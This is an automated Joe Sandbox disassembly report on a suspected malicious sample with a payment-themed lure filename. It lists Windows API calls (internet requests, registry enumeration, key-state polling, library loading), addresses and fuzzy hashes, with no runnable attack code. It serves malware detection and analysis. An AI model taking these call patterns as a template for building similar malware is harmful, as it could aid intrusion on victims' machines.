                                                          • API ID: BuffCharLower
                                                          • String ID: cdecl$none$stdcall$winapi
                                                          • API String ID: 2358735015-567219261
                                                          • Opcode ID: e95617ca3908c3eeaf570e3eb0c66ba73713e36f1e0be685006cec511d8d3e1f
                                                          • Instruction ID: de791093e389b1fe2a1db9134b112d7d3253e0282dfee89f69eb66ef1d37856a
                                                          • Opcode Fuzzy Hash: e95617ca3908c3eeaf570e3eb0c66ba73713e36f1e0be685006cec511d8d3e1f
                                                          • Instruction Fuzzy Hash: 2531907051021AABCF00EF68C841EEEB3F8FF55310B0086A9E866A72D1DB75E915CB40
                                                          APIs
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B9B88E
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B9B8A1
                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B9B8D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 3850602802-1403004172
                                                          • Opcode ID: 51d1bdae36f59d5174e4f95b3cffbda25aa23ee4d845b776b6f3e87c42e942b7
                                                          • Instruction ID: 5b50aaa5f3adef0e46380a420f5571268d696f501a8eb721eb93e45d01edcd66
                                                          • Opcode Fuzzy Hash: 51d1bdae36f59d5174e4f95b3cffbda25aa23ee4d845b776b6f3e87c42e942b7
                                                          • Instruction Fuzzy Hash: 0D21D076900108AFDB04ABA4D886DFE7BF9DF19350B1042B9F065A71E0DB685D0A9760
                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BB4401
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BB4427
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BB4457
                                                          • InternetCloseHandle.WININET(00000000), ref: 00BB449E
                                                            • Part of subcall function 00BB5052: GetLastError.KERNEL32(?,?,00BB43CC,00000000,00000000,00000001), ref: 00BB5067
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 1951874230-3916222277
                                                          • Opcode ID: 51d4889384b6ec5effe560dba4132d0d087b087e47d39bd10d3f9c971a0ef7c5
                                                          • Instruction ID: 03ee325170e1168285be513b144664f55677b2efed1112bc7bad8cccfbb806ac
                                                          • Opcode Fuzzy Hash: 51d4889384b6ec5effe560dba4132d0d087b087e47d39bd10d3f9c971a0ef7c5
                                                          • Instruction Fuzzy Hash: E6216AB2600208BFE721AB548CC5FFBBAECFB48748F10855AF10996241EFA48D059761
                                                          APIs
                                                            • Part of subcall function 00B7D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B7D1BA
                                                            • Part of subcall function 00B7D17C: GetStockObject.GDI32(00000011), ref: 00B7D1CE
                                                            • Part of subcall function 00B7D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7D1D8
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BC915C
                                                          • LoadLibraryW.KERNEL32(?), ref: 00BC9163
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BC9178
                                                          • DestroyWindow.USER32(?), ref: 00BC9180
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                          • String ID: SysAnimate32
                                                          • API String ID: 4146253029-1011021900
                                                          • Opcode ID: 53e2733f7a56bfe3faec39042fa0288fd70be5f5943b91c467dd69f0a92fe8cb
                                                          • Instruction ID: 9e4aac4a45e21b240bd284227bfc492a03b3bb9ce1d877cfd85cd6f220abd8e4
                                                          • Opcode Fuzzy Hash: 53e2733f7a56bfe3faec39042fa0288fd70be5f5943b91c467dd69f0a92fe8cb
                                                          • Instruction Fuzzy Hash: B7218B71200206BFFF204E649C8AFBA37E9EF99364F19069CF914A7190C771DC52A764
                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00BA9588
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BA95B9
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00BA95CB
                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00BA9605
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 187b7c1abf0d9f2d0f4086d92fd737d1f48d512ba9597cab6f34c2b109b75adf
                                                          • Instruction ID: 1c145a2ba8767eeab94aebda07c494122a21f61a56f6435ff2558a8f01061a77
                                                          • Opcode Fuzzy Hash: 187b7c1abf0d9f2d0f4086d92fd737d1f48d512ba9597cab6f34c2b109b75adf
                                                          • Instruction Fuzzy Hash: 04218170904305AFDB219F25DC46A9E77F4EF56720F204A59F9A1DB2D0DB70D940EB10
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00BA9653
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BA9683
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00BA9694
                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00BA96CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: b97cfccc5a12369900bbd99e5e7adaff5366198ec9380637c1e6083fb9951000
                                                          • Instruction ID: 0a0704c03c8347e90aba82071e43ccb5bc65ae01a42269e2c6b84dbed798f4c2
                                                          • Opcode Fuzzy Hash: b97cfccc5a12369900bbd99e5e7adaff5366198ec9380637c1e6083fb9951000
                                                          • Instruction Fuzzy Hash: D921AF716042059FDB249F6DDC44E9A77E8EF47720F200A99FAA1E72D0EBB09841EB10
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00BADB0A
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00BADB5E
                                                          • __swprintf.LIBCMT ref: 00BADB77
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00BFDC00), ref: 00BADBB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                          • String ID: %lu
                                                          • API String ID: 3164766367-685833217
                                                          • Opcode ID: 2e841b5e5ade40acfa99953b23cfe7f5eb99cc08f2552f442bc3681ca4debb6e
                                                          • Instruction ID: ed8be3cb8d2ce943605e4d8853ebc8a7ad777bc511bc2339e0e278d3a480e1b0
                                                          • Opcode Fuzzy Hash: 2e841b5e5ade40acfa99953b23cfe7f5eb99cc08f2552f442bc3681ca4debb6e
                                                          • Instruction Fuzzy Hash: CA219575600148AFCB10EFA4CD85EAEBBF8EF49704B0040A9F509EB261DB71EE41CB61
                                                          APIs
                                                            • Part of subcall function 00B9C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B9C84A
                                                            • Part of subcall function 00B9C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B9C85D
                                                            • Part of subcall function 00B9C82D: GetCurrentThreadId.KERNEL32 ref: 00B9C864
                                                            • Part of subcall function 00B9C82D: AttachThreadInput.USER32(00000000), ref: 00B9C86B
                                                          • GetFocus.USER32 ref: 00B9CA05
                                                            • Part of subcall function 00B9C876: GetParent.USER32(?), ref: 00B9C884
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00B9CA4E
                                                          • EnumChildWindows.USER32(?,00B9CAC4), ref: 00B9CA76
                                                          • __swprintf.LIBCMT ref: 00B9CA90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                          • String ID: %s%d
                                                          • API String ID: 3187004680-1110647743
                                                          • Opcode ID: 06db0a007c29b3d64883e8cd5e143106ef1600381332e0694cdd71ccd1d95bc4
                                                          • Instruction ID: f0d12b6bc4a426302111c5080dffbd5bebfa7566520ef2db0c123a8732e6a735
                                                          • Opcode Fuzzy Hash: 06db0a007c29b3d64883e8cd5e143106ef1600381332e0694cdd71ccd1d95bc4
                                                          • Instruction Fuzzy Hash: C6117FB56002096BDF11BFA48CC5FA93BA8AB44714F0080B6FA09AA196CB749945DB70
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BC19F3
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BC1A26
                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00BC1B49
                                                          • CloseHandle.KERNEL32(?), ref: 00BC1BBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                          • String ID:
                                                          • API String ID: 2364364464-0
                                                          • Opcode ID: d2b2e1c28314660125b76c7c04884e54f943dbef1c17f958c3a85d9be70959a9
                                                          • Instruction ID: c05c285b07016f267ec6a4dbffbc758e564e73368da6cdd7109a555e9778c451
                                                          • Opcode Fuzzy Hash: d2b2e1c28314660125b76c7c04884e54f943dbef1c17f958c3a85d9be70959a9
                                                          • Instruction Fuzzy Hash: 3E814070600214ABDF119F68C896BADBBE5EF05720F14C899F919BF382D7B5AD418B90
                                                          APIs
                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00BCE1D5
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00BCE20D
                                                          • IsDlgButtonChecked.USER32(?,00000001), ref: 00BCE248
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00BCE269
                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BCE281
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ButtonCheckedLongWindow
                                                          • String ID:
                                                          • API String ID: 3188977179-0
                                                          • Opcode ID: 41535b4babfb4eb73c512673d855d7deba277bf58f3e5bd48c8385c50d427a01
                                                          • Instruction ID: 91e56fa669bdb4ee2a79bf99fee763f6e1683214dd4716ff9256e03288e74b34
                                                          • Opcode Fuzzy Hash: 41535b4babfb4eb73c512673d855d7deba277bf58f3e5bd48c8385c50d427a01
                                                          • Instruction Fuzzy Hash: BE617D75A00244EFDB25CF58C895FAE77FAEB49300F1840ADF969AB2A1C770E950CB50
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00BA1CB4
                                                          • VariantClear.OLEAUT32(00000013), ref: 00BA1D26
                                                          • VariantClear.OLEAUT32(00000000), ref: 00BA1D81
                                                          • VariantClear.OLEAUT32(?), ref: 00BA1DF8
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00BA1E26
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType
                                                          • String ID:
                                                          • API String ID: 4136290138-0
                                                          • Opcode ID: 3dab43a1b5c8b73ad1ae2515ec6a6c49769e33d0d395f28b1d72582f21cdbd6f
                                                          • Instruction ID: 32b88e76bc94c640c882d164766e0a4e64c06b3ada03a286230b9bc4d4dab2ce
                                                          • Opcode Fuzzy Hash: 3dab43a1b5c8b73ad1ae2515ec6a6c49769e33d0d395f28b1d72582f21cdbd6f
                                                          • Instruction Fuzzy Hash: FC5139B5A00209AFDB14CF58C880EAAB7F8FF4D314F158569E959DB341D730EA51CBA0
                                                          APIs
                                                            • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                            • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                          • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00BC06EE
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00BC077D
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00BC079B
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00BC07E1
                                                          • FreeLibrary.KERNEL32(00000000,00000004), ref: 00BC07FB
                                                            • Part of subcall function 00B7E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00BAA574,?,?,00000000,00000008), ref: 00B7E675
                                                            • Part of subcall function 00B7E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00BAA574,?,?,00000000,00000008), ref: 00B7E699
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 327935632-0
                                                          • Opcode ID: 41e33582636f297b7f1659f7e54c2806dc81c99934efdd0f97fa699493738e5e
                                                          • Instruction ID: 40c667a339193199949646d4266f43ff96aab9d5a1485fb9185d441194ec6262
                                                          • Opcode Fuzzy Hash: 41e33582636f297b7f1659f7e54c2806dc81c99934efdd0f97fa699493738e5e
                                                          • Instruction Fuzzy Hash: C2512875A00205DFCB04EFA8C491EADB7F5FF58310B04809AE956AB352DB74ED45CB90
                                                          APIs
                                                            • Part of subcall function 00BC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC2EEF
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BC2F2E
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BC2F75
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00BC2FA1
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00BC2FAE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                          • String ID:
                                                          • API String ID: 3740051246-0
                                                          • Opcode ID: 7babf5138a77cf5b60d2fff778b112f74eba72fca071c60c8b853108108209ae
                                                          • Instruction ID: 06378c782c3ce1b0a988be8de46b77ebdcd74b1ad72934375d9aa1a5f6fa6e02
                                                          • Opcode Fuzzy Hash: 7babf5138a77cf5b60d2fff778b112f74eba72fca071c60c8b853108108209ae
                                                          • Instruction Fuzzy Hash: 81515B71608208AFD704EF64C891F6ABBF9FF88304F0488ADF595972A1DB75E905CB52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69562106e0e1f58a1253a568c315bb36b5fac0fddedb246b18ac30c6d7bb04d1
                                                          • Instruction ID: 5f6d484c55f138b82df38c42cf480d7c04ffa9a898dba7cab3444893f3a5225c
                                                          • Opcode Fuzzy Hash: 69562106e0e1f58a1253a568c315bb36b5fac0fddedb246b18ac30c6d7bb04d1
                                                          • Instruction Fuzzy Hash: 6F41B679A00245AFC720DF68CC84FA97FE4EB29310F1502B9F95EA72E1C770AD41D690
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00BB12B4
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00BB12DD
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00BB131C
                                                            • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                            • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00BB1341
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00BB1349
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1389676194-0
                                                          • Opcode ID: 17f8be9e1d2b6b4f100d981469c625e882ddc74494884369162fd4b4250901c0
                                                          • Instruction ID: 0ba1b6b82e283106eca28cd52ba11477a7b4e33fc884a6cdde457285fc28d09f
                                                          • Opcode Fuzzy Hash: 17f8be9e1d2b6b4f100d981469c625e882ddc74494884369162fd4b4250901c0
                                                          • Instruction Fuzzy Hash: 06410B35A00505DFDF01EF64C991AAEBBF9FF08310B1480A9E90AAB361DB75ED01DB55
                                                          APIs
                                                          • GetCursorPos.USER32(000000FF), ref: 00B7B64F
                                                          • ScreenToClient.USER32(00000000,000000FF), ref: 00B7B66C
                                                          • GetAsyncKeyState.USER32(00000001), ref: 00B7B691
                                                          • GetAsyncKeyState.USER32(00000002), ref: 00B7B69F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: 0691029a1799f643bfcc0e7272c00d836cb1f128351fcd76aa557b114fec8204
                                                          • Instruction ID: 81d08ac24640d9663d051e40738990a61474b4cd4cf65daa8a6cc32843aaf7db
                                                          • Opcode Fuzzy Hash: 0691029a1799f643bfcc0e7272c00d836cb1f128351fcd76aa557b114fec8204
